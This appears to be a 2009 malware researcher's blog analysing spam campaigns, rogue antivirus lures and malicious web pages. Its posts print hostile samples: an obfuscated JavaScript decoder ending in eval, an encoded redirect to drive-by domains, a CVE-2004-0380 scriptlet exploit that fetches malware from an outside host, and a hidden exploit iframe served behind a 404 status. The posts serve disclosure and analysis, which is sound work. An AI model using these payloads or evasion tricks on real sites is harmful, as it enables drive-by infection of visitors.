marco
blog
Menu:
"Presidential" spam
October 26, 2009
A technique often used by spammers to attempt to get their messages past spam filters consists of mixing the questionable content they advertise with legitimate text. This type of attack is sometimes called Bayesian poisoning since it is believed to specifically target spam filters that rely on Bayesian classifiers.
An example where this technique is applied is a message I received today:
I stand here today humbled by the task before
<a href=http://www.bawwgt.com>dofus kamas</a>, grateful for the trust you
have bestowed, mindful of the sacrifices borne by our
<a href=http://www.bawwgt.com>cheap dofus kamas</a>. I thank President
<a href=http://www.bawwgt.com>dofus power leveling</a> for his service to
<a href=http://www.bawwgt.com>buy dofus kamas</a>, as well as the
generosity and cooperation he has shown throughout this transition.
This message consists of the first few sentences from Barack Obama's
inaugural
address,
where a few words have been substituted with links to the
www.bawwgt.com web site. This web site appears to be in the business
of selling Kamas, the currency used in the MMORPG game Dofus, and,
judging by its graphics, items from other online worlds.
Note that spam messages themed after Obama's inauguration ceremony were used by the Waledac gang to spread its malware back in January this year. If this is a trend, should we expect spam and malware to become one more reason for heated political debates?
YourBizBegin spam campaign on Facebook
October 19, 2009
A fairly successful spam campaign is currently active on Facebook. The
campaign advertises the web sites YourBizBegin.com and
YourBizStart.com, which promise easy money for working from home.
Googling for the site names shows various reports and complaints, for
example, the ones on
hkactivity,
RipoffReport,
and
Google.
The picture above shows a (sanitized) screenshot of a couple of messages that appeared on a compromised account. The text of all the spammed messages I have seen are similar to the ones shown above. The only variations I have observed so far are in the dollar amounts and the 3-letter signatures.
The web sites YourBizBegin.com and YourBizStart.com appear to be just
front-ends for
www.HomeBizOffer.net. HomeBizOffer.net pushes a "Google Profit Club
Kit," which, according to the site itself, should enable one to make an
easy $200–$943 per day via Google ads. Downloading the kit costs
only $3.95 of processing fee. Needless to say, the fine print at the
bottom of the pages discloses that a membership rate of $74.93 is
charged monthly.
Furthermore, the terms of use and privacy policy terms on
homebizoffer.net points at another web site, secureweboffer.com.
Here is some more information about the involved web sites:
- yourbizbegin.com, registrant: HAIJUN ZHAO, IP: 121.199.253.194 (TIMENET BeiJing Sincerity-times Network Technology Project Ltd.)
- yourbizstart.com, registrant: HAIJUN ZHAO, IP: 121.199.253.122 (same)
- homebizoffer.net, registrant: JIANG ZHAO, IP: 121.199.253.125 (same)
- secureweboffer.com, registrant: DomainsByProxy, IP: 174.143.244.146 (RMH-14 - Rackspace.com, Ltd.)
JavaScript anti-analysis tricks: last-modified
October 14, 2009
Writers of malicious JavaScript code have always been keen on developing novel ways to make the analysis of their code harder. One of the most commonly used mechanisms to do so is (no surprise here) simple obfuscation. For example, malware authors commonly encode string literals with custom schemes. A decoding routine then de-scrambles the strings before using them further (for example, as the URL of the next step of an attack or as the CLSID of a vulnerable ActiveX control).
Interestingly, malware authors have also introduced various techniques to make the basic deobfuscation step more difficult, in particular, if performed in an off-line analysis environment, which, for example, examines the pages saved during a crawling session.
One of the earliest trick consists of using the URL of the obfuscated page as a decoding key in the deobfuscation routine. More recently, other techniques have also been used. One I have seen lately uses the time of the last modification of the page in the decoding routine.
Consider, for example, the following script:
<html><body><script>
var gtvwx=true,abwz="",gnru=false,
bfqrv=document.lastModified.split("/"),
dilp=String,
cjltu=bfqrv[2].split(":"),
acinqu=dilp['f#r(o#mZC#h#aZrZC(o,d#e('.replace(/[\(Z,G#]/g,'')],
gnty=bfqrv[0]+"25"+cjltu[2],
ckoxz=window,cklqry=0,klny="",
bfkw=ckoxz['euv9a2lS'.replace(/[S2u9@]/g,'')],
fopv=[150,173,160...90,94,111],
ailmux=function(){
for(var ehlt;cklqry<fopv.length;cklqry++){
klny+=acinqu(fopv[cklqry]-
gnty.substring(cklqry%gnty.length,cklqry%gnty.length+1).charCodeAt(0));
bfkw(klny);
};
ailmux();
</script></body></html>
The code reads the time the page was last modified from the
document.lastModified property. This property is initialized from the
value of the Last-Modified header sent from the web server serving the
page. The script then parses the time and extracts the number of seconds
from the time string into the cjltu variable.
The seconds value is then used to compute the value of the gnty
variable, which is used in the decoding routine to recover the
in-the-clear text from the encoded array fopv..
These are the Wepawet reports for a couple of sites that use this techniques: report for hxxp://www.pipisechka.com/sleep/news.php and report for hxxp://day-evryday.cn/news.php
Mutu campaign on BlogSpot
October 10, 2009
A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.
A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.
A malicious page contains a script tag similar to the following:
<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>
The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:
- afsharteam1.com
- mihavom.cn
- news.allwinsoft.ru
- relstagu.ru
- www.pillsonlinerxhealth.net
- www.xxxodnoklassniki.com
Some of these domains appear to be selling various items (cell phone,
drugs). However, others (at least afsharteam1.com) launch
drive-by-download attacks. As a result, a malware with limited and
generic detection on
VirusTotal gets downloaded and launched on the
vicitm's machine.
For more details, see the Wepawet report for
bertilladingman36429.blogspot.com,
a blog that redirects to drive-by attacks.
Old exploit still kicking (CVE-2004-0380)
October 9, 2009
Some exploits just do not want to go away.
Case in point is an exploit for CVE-2004-0380 (yes, 2004!) that I have recently found in hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:
<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
data="MK:@MSITStore:m
html:c:\.mht!ht
tp://http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>
The object tag instantiates a
scriptlet.
A scriptlet is essentially a reusable object written as a regular web
page in which scripts follow certain conventions. Think of ActiveX
controls implemented in HTML and VB script. For the sake of historical
completeness,
scriptlets were introduced in Internet Explorer 4, deprecated in
Internet Explorer 5, and disabled by default in Internet Explorer 7.
Talk about a successful technology...
After a simple decoding step, the data attribute of the scriptlet
reveals the content
MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg
::/102.htm, which, on a vulnerable system, would cause the malware
logo.gif to be downloaded on the victim's computer.
The malware logo.gif has surprisingly good detection on
VirusTotal
(34/41!). I wonder if it is also been around since 2004...
Liberty exploit toolkit
October 8, 2009
Here is another exploit toolkit that has been making the rounds
recently: the Liberty exploit pack. Most notably, in mid-September,
Liberty was used in a drive-by-download campaign that injected iframes
pointing at searra-ditol.cn and embrari-1.cn into a large number of
vulnerable web sites.
A couple of pages from the toolkit admin panel:
The browser statistics page:
The referrer statistics page:
Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.
JavaScript anti-analysis tricks: 404 status code
October 4, 2009
Here is an old trick for foiling manual and automated analysis of malicious pages that I still see used from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Regularly, this error message indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correcting the error. However, in the case of malicious pages that use this trick, the body of the apparently missing page contains code that attempts to exploit some browser vulnerabilities or to redirects to other malicious web sites.
The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:
HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html
<iframe src="http://213.163.89.54/lib/index.php"
width=0 height=0
style="hidden"
frameborder=0 marginheight=0 marginwidth=0
scrolling=no>
</iframe>
The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 error code would not reveal any wrongdoing. A complete analysis instead (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection a malicious PDF and Flash files are delivered to the visitor's browser.
SEO to the top
October 2, 2009
A couple of days ago, Stephan Chenette of Websense had a nice post out on an active SEO campaign (in the following days, Websense has also released an alert to discuss how the campaign abuses the launch of Google Wave).
I am also following this campaign, which seems quite widespread, in terms of the number of web sites and search terms that are involved. Unfortunately, the campaign is also successful in pushing some of its malicious pages high up in the results returned for popular query terms by Google.
Here is a case where they even make it to the top spot:
As explained in Chenette's post, the malicious results (in red in the figure above) redirect to sites that push rogue AV software.
No doubt, the taste of that John Dory is going to be quite... sour.
Rogue AV...via Skype
October 1, 2009
A new (at least for me) twist on the distribution of rogue AV software. Skype
user online.notification.america17, whose full name is, cleverly enough,
Online Notification, sent me a chat (see below) to inform me that the "Security
Center has detected malware on my computer".
The URL that is referenced in the message (www.securonline.net) is currently down, but is listed in several blacklists, for example, hpHosts and WOT.
